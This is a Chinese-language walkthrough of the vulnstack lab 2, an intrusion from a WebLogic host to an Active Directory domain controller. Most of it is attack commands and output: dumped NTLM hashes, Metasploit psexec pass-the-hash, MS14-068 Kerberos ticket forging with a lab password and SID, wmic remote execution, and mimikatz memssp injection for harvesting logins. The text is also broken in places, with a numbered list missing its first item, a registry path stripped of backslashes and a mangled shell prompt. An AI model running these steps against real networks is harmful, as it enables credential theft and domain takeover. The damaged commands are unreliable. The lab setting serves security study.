前言
DC
IP:10.10.10.10OS:Windows 2012(64)
应用:AD域
WEB
IP1:10.10.10.80
应用:Weblogic 10.3.6MSSQL 2008
PC
IP1:10.10.10.201
外网初探
常用的绕过方法也是文章中总结的几种:
2,DLL 劫持;
3,Windows 自身漏洞提权;
4,远程注入;
5,COM 接口技术。
我这里选用的exp是CVE-2018-8120这个exp,然后使用cs生成一个exe文件,一会使用exp来执行cs来反弹一个shell回来,我们先上传exp上去
内网初探:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
msf5 exploit(windows/smb/psexec_psh) > set rhosts 10.10.10.201
rhosts => 10.10.10.201
msf5 exploit(windows/smb/psexec_psh) > set smbuser mssql
smbuser => mssql
msf5 exploit(windows/smb/psexec_psh) > set subpass aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24
subpass => aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24
msf5 exploit(windows/smb/psexec_psh) > set smbpass aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24
smbpass => aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24
![从外网到域控(vulnstack靶机实战2) 从外网到域控(vulnstack靶机实战2)]()
✘ ⚡ root@kali MS14-068/pykek master ● proxychains python ms14-068.py -u [email protected] -s S-1-5-21-2756371121-2868759905-3853650604-1001 -d 10.10.10.10 -p '1qaz@WSX'
ProxyChains-3.1 (http://proxychains.sf.net)
[for 10.10.10.10... Done! ] Building AS-REQ
[10.10.10.10...|S-chain|-<>-127.0.0.1:48979-<><>-10.10.10.10:88-<><>-OK ] Sending AS-REQ to
Done!
[from 10.10.10.10... Done! ] Receiving AS-REP
[from 10.10.10.10... Done! ] Parsing AS-REP
[for 10.10.10.10... Done! ] Building TGS-REQ
[10.10.10.10...|S-chain|-<>-127.0.0.1:48979-<><>-10.10.10.10:88-<><>-OK ] Sending TGS-REQ to
Done!
[from 10.10.10.10... Done! ] Receiving TGS-REP
[from 10.10.10.10... Done! ] Parsing TGS-REP
['[email protected]'... Done! ] Creating ccache file
-
de1ay.com 为 域名 -
de1ay 为域中的一个用户 -
1qaz@WSX 为 de1ay 的密码 -
de1ay 的 sid 为S-1-5-21-2756371121-2868759905-3853650604-1001 -
10.10.10.10为域控的 IP
⚡ root-068/pykek master ● python KrbCredExport/KrbCredExport.py TGT_de1ay .com.ccache de1ay.ticket MS14
CCache File Found, Converting to kirbi
wmic /node:ip地址 /user:用户名 /password:密码 process call create cmd.exe
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # misc::memssp
Injected =)
mimikatz # exit
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
写在后面
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论